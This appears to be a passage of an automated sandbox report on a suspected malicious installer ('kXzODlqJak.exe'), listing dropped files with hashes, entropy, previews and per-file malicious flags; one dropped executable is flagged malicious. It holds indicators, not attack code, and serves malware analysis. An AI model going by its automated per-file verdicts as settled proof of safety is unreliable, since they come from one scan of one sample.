                                                                                                                                                                                                                                                                          Size (bytes):86
                                                                                                                                                                                                                                                                          Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                          MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                          SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                          SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                          SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44707
                                                                                                                                                                                                                                                                          Entropy (8bit):6.095908255950481
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xjbLmZlGjrgb5UflzKqSGPEXKwWE7RTupzKscDX//N+:z/Ps+wsI7yOcGe5bKoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:0E272CC3057753461BEFB9979BEFC8C8
                                                                                                                                                                                                                                                                          SHA1:320104228022EA2A61A2AE755FC4860E4D0E0CE5
                                                                                                                                                                                                                                                                          SHA-256:AC11E852CFE72F3A78A8CABDFEF6814407E8D03AA793D5C78FFD0D86D2963833
                                                                                                                                                                                                                                                                          SHA-512:4881D9951373AAB1CA2E85E689A8F4F7973C56024C43215DBC6F88C174A263F55968339EF09ADDAEF9381A98B2803964A986469418F29D468578ED5884A9A39A
                                                                                                                                                                                                                                                                          Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):45979
                                                                                                                                                                                                                                                                          Entropy (8bit):6.087984989217149
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:dMkbJrT8IeQc5oXAYLmZlGjrgb5UvlzKqSGPEX9N2aPEC1oCwWE7RTupzKscDX/c:dMk1rT8HQXiGe5H98aPEIoCoRTuik
                                                                                                                                                                                                                                                                          MD5:9827CA834F91F5085FD6405E4631887C
                                                                                                                                                                                                                                                                          SHA1:B1CD220D7FA29A0FD478A4CA66C233456293505A
                                                                                                                                                                                                                                                                          SHA-256:D1ACDFC631299869B75A4B3A0650EEE5548F4BE5038E29E13578EFB930281BAD
                                                                                                                                                                                                                                                                          SHA-512:E94A9181DE75E5B87034A7A487570F4631970FEEDED954437EE2F73A79AAA11FBCDE5E708957A7E960748C568BA168730F11CEEB0DEA3316FD1EE86C3F713279
                                                                                                                                                                                                                                                                          Malicious:false
Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"1e26a01c-02be-45e7-bc52-31cef67b936b"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):45902
                                                                                                                                                                                                                                                                          Entropy (8bit):6.088040418810304
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:dMkbJrT8IeQc5dXAYLmZlGjrgb5UflzKqSGPEX9N2aPEC1oCwWE7RTupzKscDX/c:dMk1rT8H1XiGe5b98aPEIoCoRTuik
                                                                                                                                                                                                                                                                          MD5:6D74D5E34D98241AF6DD8BC6A1FD6700
                                                                                                                                                                                                                                                                          SHA1:DEB85B3C666A11CA9C00DC8AA79C6E6BB3B25880
                                                                                                                                                                                                                                                                          SHA-256:AEC40D0289ED666D5C3FEC3476355DDA1A466330860EFFE296BC53EB3A8F72F5
                                                                                                                                                                                                                                                                          SHA-512:E1CEAB5E8E1AC15EDAC6B50039112E4539FF69B69E2FF5859D2E7D6A6427581A7EA97042B64115FEF961FCD9068A9DEC665C0F62160820A4D995E589DDD0AFBB
                                                                                                                                                                                                                                                                          Malicious:false
Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"1e26a01c-02be-45e7-bc52-31cef67b936b"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):45979
                                                                                                                                                                                                                                                                          Entropy (8bit):6.087983206951434
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:dMkbJrT8IeQc5oKAYLmZlGjrgb5UvlzKqSGPEX9N2aPEC1oCwWE7RTupzKscDX/c:dMk1rT8HQKiGe5H98aPEIoCoRTuik
                                                                                                                                                                                                                                                                          MD5:BCAC89C9737A2AF1FD5B2B8B31626CED
                                                                                                                                                                                                                                                                          SHA1:FD42AE2C0561B0484A95D1E47B25AC2CF75C1BD5
                                                                                                                                                                                                                                                                          SHA-256:F7A2CA73F3826E894B57A4AB8EEE6A1F05D610018E6756C61829A749012E483C
                                                                                                                                                                                                                                                                          SHA-512:A391D7C345A20356BB61E39C12D3CB83C84A600B017536EDD65ECB69C1329FA9B7C12BFA1B1A307F34412E29000C42AB5DE00779CBD64E148E0DBAD313234FFF
                                                                                                                                                                                                                                                                          Malicious:false
Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"1e26a01c-02be-45e7-bc52-31cef67b936b"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2278
                                                                                                                                                                                                                                                                          Entropy (8bit):3.838148767621563
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxrgxzxl9Il8u8/SEK0JohvOUsMqH4uCid1rc:myYmqEaOdM9uCB
                                                                                                                                                                                                                                                                          MD5:D1BCB32CE7433E3258BE41B6DABAE1CD
                                                                                                                                                                                                                                                                          SHA1:689AC0C9AD08C8CE69A45F4E208F6D1D17E2BA81
                                                                                                                                                                                                                                                                          SHA-256:93AA977BA5DF6569B915E1B4E9AD805763F20F7EE9BC776C9AF7C94D1E5D427B
                                                                                                                                                                                                                                                                          SHA-512:C69AB8A5DDD670ABA9F9C48BFB73C9D8E2F0BF6FE53889D22C2369B716D1B465593D59E02396D37062926710B1CAC2F151617611DDE42EAB6A0366E1BA4B9CC9
                                                                                                                                                                                                                                                                          Malicious:false
Preview:{"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"WipwWM+NHlbCDmsZp8SOsjhtFBs="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"AH6RjKZi2wE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AAAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAEwjfJe
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4622
                                                                                                                                                                                                                                                                          Entropy (8bit):3.9970158227595505
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxExixD9Il8unecIzWi5OyPjdOyrVgDlEy0zSLfveDPsRcEX19qD6lHKMao:gYU/Oy7dEDlEhuejzhD6lHKVuqPCSe
                                                                                                                                                                                                                                                                          MD5:AAA2E08950B3090CAF981B430BB0747B
                                                                                                                                                                                                                                                                          SHA1:A0D419E1B99CCBB9BB0ADC0878470D025970B0C3
                                                                                                                                                                                                                                                                          SHA-256:3E95D939B3CD71BA43FFFAA17EAA289E73A0C6181F00E7B447A1AFBCC40F3E11
                                                                                                                                                                                                                                                                          SHA-512:90E219C7055DF0A7060749D5A20668694B06A506DDF97D5AEE85AE2E05F93C948836D012520D3A01168E83EF294B565BD319B82AFFAD6504178733374FB40E1D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2684
                                                                                                                                                                                                                                                                          Entropy (8bit):3.907703654841137
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKx68Wa7xCxl9Il8ujcTMDVK8bmKlCT0TI4OSy7d/vc:aQYlcTMJ/DlCT0c4OBG
                                                                                                                                                                                                                                                                          MD5:B237B0CBF5BB5FB30B4B22EC0157D6B2
                                                                                                                                                                                                                                                                          SHA1:A493BC0207910BDD0CA7A453DCB23EDDF74A6EBD
                                                                                                                                                                                                                                                                          SHA-256:92C1052EAEF6F695C210EC04D29FCE9851997F3A64792509A3F843CD5A298055
                                                                                                                                                                                                                                                                          SHA-512:170475584F292AC581727FB152E217F1EDF30799AAC9EC6844AEBCD9E3FF81E18766651042A5A3087980432EDF7FEFC4B29289E910CFFA8464005DE012C888DE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):76326
                                                                                                                                                                                                                                                                          Entropy (8bit):7.9961120748813075
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
                                                                                                                                                                                                                                                                          MD5:01E352D35675990A139199DD86B38AAC
                                                                                                                                                                                                                                                                          SHA1:E16163C81E5F36B3B819AA0A63BFA63D88548A91
                                                                                                                                                                                                                                                                          SHA-256:148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
                                                                                                                                                                                                                                                                          SHA-512:75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):5622661
                                                                                                                                                                                                                                                                          Entropy (8bit):7.7230462594085205
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:Q5PkZigz346apnxZq8IjyVuzP90/zL97/4qvXMOkuoNn/H3jlXRgtQwV:APkZigzipnxZhuzVQ/lfvXMhuot/jNRC
                                                                                                                                                                                                                                                                          MD5:384EA84BA63602643E33778F5DDB7345
                                                                                                                                                                                                                                                                          SHA1:9F802095A0AF1109A39AD88D15A2774DD73A7144
                                                                                                                                                                                                                                                                          SHA-256:C9E723A18D7BC536EC6AB80FBD3634C21DAC6C45F433D377959140DDAC625C8A
                                                                                                                                                                                                                                                                          SHA-512:410BA151DE02ED889E12BC8A31F262C3D58DE6399F26BB412BA3D64892A64603F65C49BC606C8F5909C632331E96266F3B44F6D81F16A1BDE25354FCE2D1E97B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1577118
                                                                                                                                                                                                                                                                          Entropy (8bit):7.993216544070068
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:49152:aqnqd2fO3GtAAkC4hIdpzW3CKZlJxOvHAbZ:Hn02f4GCF5IdpzKC4JgvA1
                                                                                                                                                                                                                                                                          MD5:4C2FF49D567789294875DF9B7709AD9C
                                                                                                                                                                                                                                                                          SHA1:941A61C93D24F13E5F31FF86A0B7E8D8FF80EDD8
                                                                                                                                                                                                                                                                          SHA-256:AF6D4132A72C85EDD8201B391F0431483DDBCA9770F8DE7AA1D000459762420A
                                                                                                                                                                                                                                                                          SHA-512:17EED90683F34AAB5E6FC8FE67402CE346CC9BA2C6355B8287ED771E9166D41FC2B6C82FE6E9BC81262B1A32FE05434EDC0968321E778F6380CC9F88F474BFE6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):11185
                                                                                                                                                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2364728
                                                                                                                                                                                                                                                                          Entropy (8bit):6.606009669324617
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                                                                                                                                                                                                                                          MD5:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                                                                                                                          SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                                                                                                                                                                                                                                          SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                                                                                                                                                                                                                                          SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                          • Filename: 8Rmoal0v85.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: K3UtwU3CH9.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: 24EPV9vjc5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: VmjvNTbD5J.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: 1wrLmYiC62.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: vV5EOx0ipU.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: 8Rmoal0v85.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: cLm7ThwEvh.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: LVkAi4PBv6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):734
                                                                                                                                                                                                                                                                          Entropy (8bit):5.423020423609568
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:zat23uXNULLWUzstOtESRcP2EmRK8tESRcP2EWKBtESRcP2rRKaHFww6ChtXO:sgYNwLLzW0BcP2HBcP2qBcP2tHWD4+
                                                                                                                                                                                                                                                                          MD5:DE6CB6BA913ACAB5F775CE512729E3FA
                                                                                                                                                                                                                                                                          SHA1:13A3613C24259E852C8983EFA490389EFDF98316
                                                                                                                                                                                                                                                                          SHA-256:2BD05DFD0FD1B1BFBF47E5C52374883C9BD91CAC4B76EB2C6C7C07B12CF7B032
                                                                                                                                                                                                                                                                          SHA-512:5E550EC6DB80C9D375AB29C392CB6667EED583F034ACC7CE09D51F6B5468F8452F93C1FE9396BC923B2FD56B7973D3859C25D39B3E781FEB3B494DA50D3DA8EA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[1B60:1B64][2025-01-09T08:54:12]i001: Burn x86 v4.0.0+8c757c0f67f26f21c6bcbbfb81b7ea8b91c35fe4, Windows v10.0 x64 (Build 19045: Service Pack 0), path: C:\Users\user\Desktop\kXzODlqJak.exe..[1B60:1B64][2025-01-09T08:54:12]i009: Command Line: ''..[1B60:1B64][2025-01-09T08:54:12]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\kXzODlqJak.exe'..[1B60:1B64][2025-01-09T08:54:12]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1B60:1B64][2025-01-09T08:54:12]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Rubrician_20250109085412.cleanroom.log'..[1B60:1B64][2025-01-09T08:54:45]i017: Exit code: 0x0..
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1120
                                                                                                                                                                                                                                                                          Entropy (8bit):5.4905952324886735
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:jPYNwLLz/G/dyIbacP24acP2pfgcP2tHWOvLfgcP2JfgcP2YfgcP2/1:jQNu/GVyGF3Faf3K7Lf3Of3pf3S1
                                                                                                                                                                                                                                                                          MD5:023A50240BAB9CD0508FBB7A594DDE4E
                                                                                                                                                                                                                                                                          SHA1:1DD220215E42709235AEA8093D69D3450D6E8DF4
                                                                                                                                                                                                                                                                          SHA-256:FF1233C206DE006B0F26BEAF2625C3597E8F037D02B3E251FFF317145C9BACE6
                                                                                                                                                                                                                                                                          SHA-512:71076FDFE2CD0399EBDE22ACDA3878E76521A59468F60C9DAD2788B3F9A22ED0F0D65F95DF15AD5882EE8518E1E71728DFFCD23559BC9138C19D422A499AF74B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[1A88:08A4][2025-01-09T08:54:13]i001: Burn x86 v4.0.0+8c757c0f67f26f21c6bcbbfb81b7ea8b91c35fe4, Windows v10.0 x64 (Build 19045: Service Pack 0), path: C:\Windows\TEMP\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe..[1A88:08A4][2025-01-09T08:54:13]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\kXzODlqJak.exe -burn.filehandle.attached=636 -burn.filehandle.self=632'..[1A88:08A4][2025-01-09T08:54:13]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\kXzODlqJak.exe'..[1A88:08A4][2025-01-09T08:54:13]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1A88:08A4][2025-01-09T08:54:15]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Rubrician_20250109085415.log'..[1A88:08A4][2025-01-09T08:54:15]i000: Setting string variable 'WixBundleInProgressName' to value ''..[1A88:08A4][2025-01-09T08:54:15]i000: Setting string variable 'WixBundleName' to va
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):206855
                                                                                                                                                                                                                                                                          Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                          MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                          SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                          SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                          SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1420
                                                                                                                                                                                                                                                                          Entropy (8bit):5.385759740864035
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YJxF5sQ5szAW01Rp5yK10YO5qv70VhQu5Fa0s25w6bi3J03gIx5M:YJxF5sQ5sEW01X5y60YO5qD0VH5Fa0sb
                                                                                                                                                                                                                                                                          MD5:2D2B854FE1760A0378CEA2D703A0D4AB
                                                                                                                                                                                                                                                                          SHA1:4A75F573F64B7DE27EFC4AE4A966DB4EB357788A
                                                                                                                                                                                                                                                                          SHA-256:06B4863B62805509226ECFBD4A45C8F7F75E11602E8E892C7E4E81F9E7B3A482
                                                                                                                                                                                                                                                                          SHA-512:30F0E8482BD9A493AF645783A4BE66B54CB06486262F21AC2693C56FE6D617A36E70950ECEB9B8A931A5D67A96670120408DDCF94975AFAEF1723E40C65D5C02
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):5622661
                                                                                                                                                                                                                                                                          Entropy (8bit):7.723046263557884
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:j5PkZigz346apnxZq8IjyVuzP90/zL97/4qvXMOkuoNn/H3jlXRgtQwV:dPkZigzipnxZhuzVQ/lfvXMhuot/jNRC
                                                                                                                                                                                                                                                                          MD5:BED5BD07F8922209B91498A40AF66EFE
                                                                                                                                                                                                                                                                          SHA1:077A85662351A91133DBB28D7F601BE2D4C9653E
